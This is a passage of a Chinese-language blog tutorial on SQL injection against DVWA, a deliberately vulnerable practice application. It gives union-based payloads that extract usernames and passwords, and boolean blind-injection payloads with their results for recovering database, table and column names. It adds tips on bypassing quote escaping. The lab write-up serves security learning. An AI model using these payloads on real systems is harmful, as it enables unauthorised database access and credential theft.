class="keyword">false</span> : $___mysqli_res);        </span></span><br><span class="line"><span class="php">&#125;</span></span><br><span class="line"></span><br><span class="line"><span class="php"><span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>

<p>high等级的查询是通过在弹出页面输入id然后提交进行查询，将数据展示在原页面上，<br>而且id的值储存在了SESSION中，程序也没有对id进行任何的安全处理，这样产生了sql注入问题<br>high等级的这种做法能够避免sqlmap进行爆破，但是如果不对数据进行安全处理，还是会引发安全问题</p>
<p>high等级的注入payload和low等级的基本相同</p>
<figure class="highlight gauss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">' order by <span class="number">1</span><span class="meta">#		正常</span></span><br><span class="line">' order by <span class="number">2</span><span class="meta">#		正常</span></span><br><span class="line">' order by <span class="number">3</span><span class="meta">#		返回错误字段数为2</span></span><br><span class="line">' <span class="built_in">union</span> <span class="built_in">select</span> <span class="number">1</span>,<span class="built_in">database</span>()<span class="meta">#		查数据库名</span></span><br><span class="line">' <span class="built_in">union</span> <span class="built_in">select</span> <span class="number">1</span>,table_name from information_schema.tables <span class="built_in">where</span> table_schema=<span class="built_in">database</span>()<span class="meta">#		查表名</span></span><br><span class="line">' <span class="built_in">union</span> <span class="built_in">select</span> <span class="number">1</span>,column_name from information_schema.columns <span class="built_in">where</span> table_name='users'<span class="meta">#		查列名</span></span><br><span class="line">' <span class="built_in">union</span> <span class="built_in">select</span> user,password from dvwa.users<span class="meta">#		查字段</span></span><br></pre></td></tr></table></figure>

<hr>
<h1 id="SQL-Injection-Blind"><a href="#SQL-Injection-Blind" class="headerlink" title="SQL Injection(Blind)"></a>SQL Injection(Blind)</h1><ul>
<li>对于基于布尔的盲注，可通过构造真or假判断条件(数据库各项信息取值的大小比较，如:字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…)，将构造的sql语句提交到服务器，然后根据服务器对不同的请求返回不同的页面结果(True、False)；然后不断调整判断条件中的数值以逼近真实值，特别是需要关注响应从True&lt;–&gt;False发生变化的转折点。</li>
<li>对于基于时间的盲注，通过构造真or假判断条件的sql语句，且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求，观察服务器响应结果是否会执行所设置时间的延迟响应，以此来判断所构造条件的真or假(若执行sleep延迟，则表示当前设置的判断条件为真)；然后不断调整判断条件中的数值以逼近真实值，最终确定具体的数值大小or名称拼写。</li>
<li>报错型注入则是利用了MySQL的第8652号bug :Bug #8652 group by part of rand() returns duplicate key error来进行的盲注，使得MySQL由于函数的特性返回错误信息，进而我们可以显示我们想要的信息，从而达到注入的效果。</li>
</ul>
<p><strong>以下使用的方法均为基于布尔的盲注</strong><br>基于时间的盲注参考<a href="http://www.storysec.com/dvwa-sql-injection-blind.html" target="_blank" rel="noopener">传送门</a></p>
<h2 id="Low-Level-1"><a href="#Low-Level-1" class="headerlink" title="Low Level"></a>Low Level</h2><h3 id="判断注入类型-1"><a href="#判断注入类型-1" class="headerlink" title="判断注入类型"></a>判断注入类型</h3><table>
<thead>
<tr>
<th align="center">payload</th>
<th align="center">结果</th>
</tr>
</thead>
<tbody><tr>
<td align="center">1</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1’</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">0</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1 and 1=1#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1’ and 1=1#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1 and 1=2#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1’ and 1=2#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
</tbody></table>
<p>说明存在<strong>字符型</strong>的sql<strong>盲注</strong></p>
<h3 id="猜解数据库名"><a href="#猜解数据库名" class="headerlink" title="猜解数据库名"></a>猜解数据库名</h3><ol>
<li>猜解数据库名的长度</li>
</ol>
<table>
<thead>
<tr>
<th align="center">payload</th>
<th align="center">结果</th>
</tr>
</thead>
<tbody><tr>
<td align="center">1’ and length(database())&lt;10#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1’ and length(database())&lt;5#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">1’ and length(database())&lt;3#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and length(database())=4#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">说明数据库名长度为4</td>
<td align="center"></td>
</tr>
</tbody></table>
<ol start="2">
<li>猜解数据库名<br>利用substr()函数和ascii()函数进行猜解数据库名<br><code>substr(string, start, length)</code></li>
</ol>
<table>
<thead>
<tr>
<th align="center">payload</th>
<th align="center">结果</th>
</tr>
</thead>
<tbody><tr>
<td align="center">1’ and ascii(substr(database(),1,1))&gt;97#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and ascii(substr(database(),1,1))&lt;122#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and ascii(substr(database(),1,1))&lt;109#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and ascii(substr(database(),1,1))&lt;103#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and ascii(substr(database(),1,1))&lt;100#</td>
<td align="center">User ID is MISSING from the database.</td>
</tr>
<tr>
<td align="center">1’ and ascii(substr(database(),1,1))=100#</td>
<td align="center">User ID exists in the database.</td>
</tr>
<tr>
<td align="center">猜解出数据库名的第一个字符为ascii码为100的字符 d</td>
<td align="center"></td>
</tr>
<tr>
<td align="center">循环上述操作，最终猜解出数据库名dvwa</td>
<td align="center"></td>
</tr>
</tbody></table>
<h3 id="猜解表名"><a href="#猜解表名" class="headerlink" title="猜解表名"></a>猜解表名</h3><ol>
<li>猜解表的数量<br>最终返回exist的payload <code>1&#39; and (select count(table_name) from information_schema.tables where table_schema=&#39;dvwa&#39;)=2#</code><br>猜解出有两个表</li>
<li>猜解表名长度<br>猜解出第一个表名的长度payload <code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=&#39;dvwa&#39; limit 1),1))=9#</code><br>猜解出第二个表名的长度payload <code>1&#39; and length(substr((select table_name from information_schema.tables where table_schema=&#39;dvwa&#39; limit 1,1),1))=5#</code></li>
<li>猜解表名<br>猜解第一个表名<code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))&gt;97#</code><br>……<br>循环猜解得到第一个表名为guestbook<br>猜解第二个表名<code>1&#39; and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))&gt;97#</code><br>……<br>循环猜解得到第二个表名为users</li>
</ol>
<h3 id="猜解列名"><a href="#猜解列名" class="headerlink" title="猜解列名"></a>猜解列名</h3><ol>
<li>猜解列数量<br>payload <code>1&#39; and (select count(column_name) from information_schema.columns where table_name=&#39;users&#39;)=11#</code></li>
<li>猜解列长度<br>payload <code>1&#39; and length(substr((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),1))=7#</code><br>……<br>循环猜解出每个列名的长度</li>
<li>猜解列名<br>payload <code>1&#39; and ascii(strsub((select column_name from information_schema.columns where table_name=&#39;users&#39; limit 3,1),1,1))&gt;1#</code><br>得到列名 user_id,first_name,last_name,user,password,avatar,last_login,failed_login,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS<h3 id="猜解数据"><a href="#猜解数据" class="headerlink" title="猜解数据"></a>猜解数据</h3>payload <code>1&#39; and ascii(substr((select user from dvwa.users where user_id=1),1,1))&gt;1#</code><br>循环查询user和password的值</li>
</ol>
<h2 id="Medium-Level-1"><a href="#Medium-Level-1" class="headerlink" title="Medium Level"></a>Medium Level</h2><p>总体思路和Low没什么区别<br>思路:bp抓包提交payload，循环爆破数据库名，表名，列名，字段值<br>注意点:<strong>数字型</strong>的<strong>盲注</strong>，需要16进制绕过对引号的转义</p>
<h2 id="High-Level"><a href="#High-Level" class="headerlink" title="High Level"></a>High Level</h2><p>思路和Low也没什么区别<br>思路:构造payload，循环爆破数据库名，表名，列名，字段值<br>注意点:<strong>字符型</strong>的<strong>盲注</strong>，可能需要用#注释掉 LIMIT 语句的限制，程序中添加了随机的sleep()函数，会使得基于时间的盲注受到干扰</p>
<blockquote>
<p><strong>相关链接:</strong><br><a href="https://www.abelche.com/2018/07/02/SQL%E5%B8%B8%E7%94%A8%E8%AF%AD%E5%8F%A5-%E5%A2%9E%E5%88%A0%E6%94%B9%E6%9F%A5/" target="_blank" rel="noopener">关于SQL基本增删改查</a><br><a href="https://www.abelche.com/2018/07/25/%E5%B8%B8%E8%A7%84SQL%E6%B3%A8%E5%85%A5%E7%AC%94%E8%AE%B0/" target="_blank" rel="noopener">关于SQL注入的常见方式</a><br><a href="https://www.abelche.com/2018/08/07/SQL%E6%89%8B%E5%B7%A5%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8%E8%AF%AD%E5%8F%A5/" target="_blank" rel="noopener">SQL手注</a><br><a href="http://www.storysec.com/dvwa-sql-injection-blind.html" target="_blank" rel="noopener">dvwa基于时间的盲注</a></p>
</blockquote>

      
    </div>
    
    
    

    
      <div>
        <div id="wechat_subscriber" style="display: block; padding: 10px 0; margin: 20px auto; width: 100%; text-align: center">
    <img id="wechat_subscriber_qcode" src="/uploads/images/wechatQR_2.JPG" alt="AbelChe wechat" style="width: 200px; max-width: 100%;">
    <div>扫码加微信</div>
</div>

      </div>
    

    
      <div>
        <div style="padding: 10px 0; margin: 20px auto; width: 90%; text-align: center;">
  <div>Donate here!!!</div>
  <button id="rewardButton" disable="enable" onclick="var qr = document.getElementById('QR'); if (qr.style.display === 'none') {qr.style.display='block';} else {qr.style.display='none'}">
    <span>打赏</span>
  </button>
  <div id="QR" style="display: none;">

    
      <div id="wechat" style="display: inline-block">
        <img id="wechat_qr" src="/images/wechatpay.png" alt="AbelChe 微信支付">
        <p>微信支付</p>
      </div>
    

    
      <div id="alipay" style="display: inline-block">
        <img id="alipay_qr" src="/images/alipay.png" alt="AbelChe 支付宝">
        <p>支付宝</p>
      </div>
    

    

  </div>
</div>

      </div>
    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    AbelChe
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://AbelChe.com/2019/04/25/利用DVWA进行简单的漏洞学习/" title="利用DVWA进行简单的漏洞学习">http://AbelChe.com/2019/04/25/利用DVWA进行简单的漏洞学习/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/SQL注入/" rel="tag"># SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/17/ssrf漏洞解析/" rel="next" title="ssrf漏洞解析">
                <i class="fa fa-chevron-left"></i> ssrf漏洞解析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/27/Ubuntu1804 折腾全集/" rel="prev" title="Ubuntu1804 折腾全集">
                Ubuntu1804 折腾全集 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <a href="/"><img class="site-author-image" itemprop="image" src="/uploads/images/head.png" alt="AbelChe"></a>
            
              <a href="/"><p class="site-author-name" itemprop="name">AbelChe</p></a>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">65</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">81</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/AbelChe" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://coding.net/u/AbelChe" target="_blank" title="Coding">
                      
                        <i class="fa fa-fw fa-bullseye"></i>Coding</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://gitee.com/abelche" target="_blank" title="Gitee">
                      
                        <i class="fa fa-fw fa-codepen"></i>Gitee</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.aliyun.com" target="_blank" title="Aliyun">
                      
                        <i class="fa fa-fw fa-cloud"></i>Aliyun</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://mail.qq.com" target="_blank" title="QQ_mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>QQ_mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="http://mail.google.com/mail/" target="_blank" title="Gmail">
                      
                        <i class="fa fa-fw fa-google"></i>Gmail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://twitter.com/AbelChe7" target="_blank" title="Twitter">
                      
                        <i class="fa fa-fw fa-twitter"></i>Twitter</a>
                  </span>
                
            </div>
          

          
          
            <div class="cc-license motion-element" itemprop="license">
              <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" class="cc-opacity" target="_blank">
                <img src="/images/cc-by-nc-sa.svg" alt="Creative Commons">
              </a>
            </div>
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                LINKS
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.baidu.com" title="Baidu" target="_blank">Baidu</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.google.com" title="Google" target="_blank">Google</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.csdn.net" title="CSDN" target="_blank">CSDN</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.bilibili.com" title="Bilibili" target="_blank">Bilibili</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.taobao.com" title="Taobao" target="_blank">Taobao</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.liaoxuefeng.com/wiki/0014316089557264a6b348958f449949df42a6d3a2e542c000" title="Python Learning" target="_blank">Python Learning</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection"><span class="nav-number">1.</span> <span class="nav-text">SQL Injection</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Low-Level"><span class="nav-number">1.1.</span> <span class="nav-text">Low Level</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#判断注入类型"><span class="nav-number">1.1.1.</span> <span class="nav-text">判断注入类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解字段数"><span class="nav-number">1.1.2.</span> <span class="nav-text">猜解字段数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#尝试爆出所有字段"><span class="nav-number">1.1.3.</span> <span class="nav-text">尝试爆出所有字段</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#union拼接查询敏感信息"><span class="nav-number">1.1.4.</span> <span class="nav-text">union拼接查询敏感信息</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#审计源码和总结"><span class="nav-number">1.1.5.</span> <span class="nav-text">审计源码和总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium-Level"><span class="nav-number">1.2.</span> <span class="nav-text">Medium Level</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High-Leavel"><span class="nav-number">1.3.</span> <span class="nav-text">High Leavel</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#SQL-Injection-Blind"><span class="nav-number">2.</span> <span class="nav-text">SQL Injection(Blind)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Low-Level-1"><span class="nav-number">2.1.</span> <span class="nav-text">Low Level</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#判断注入类型-1"><span class="nav-number">2.1.1.</span> <span class="nav-text">判断注入类型</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解数据库名"><span class="nav-number">2.1.2.</span> <span class="nav-text">猜解数据库名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解表名"><span class="nav-number">2.1.3.</span> <span class="nav-text">猜解表名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解列名"><span class="nav-number">2.1.4.</span> <span class="nav-text">猜解列名</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#猜解数据"><span class="nav-number">2.1.5.</span> <span class="nav-text">猜解数据</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Medium-Level-1"><span class="nav-number">2.2.</span> <span class="nav-text">Medium Level</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#High-Level"><span class="nav-number">2.3.</span> <span class="nav-text">High Level</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">AbelChe</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">43.8k</span>
  
</div>


<!--
  <div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>
-->








        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
      <div id="needsharebutton-float">
        <span class="btn">
          <i class="fa fa-share-alt" aria-hidden="true"></i>
        </span>
      </div>
    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  










  <script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
  <script src="//unpkg.com/valine/dist/Valine.min.js"></script>
  
  <script type="text/javascript">
    var GUEST = ['nick','mail','link'];
    var guest = 'nick,mail,link';
    guest = guest.split(',').filter(item=>{
      return GUEST.indexOf(item)>-1;
    });
    new Valine({
        el: '#comments' ,
        verify: false,
        notify: false,
        appId: '3dNwvfMcT2yQEr3TkP1gFUbT-gzGzoHsz',
        appKey: 'bjkjOibLdLJcGGrHkTXWeXpA',
        placeholder: 'Just go go',
        avatar:'mm',
        guest_info:guest,
        pageSize:'10' || 10,
    });
  </script>



  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
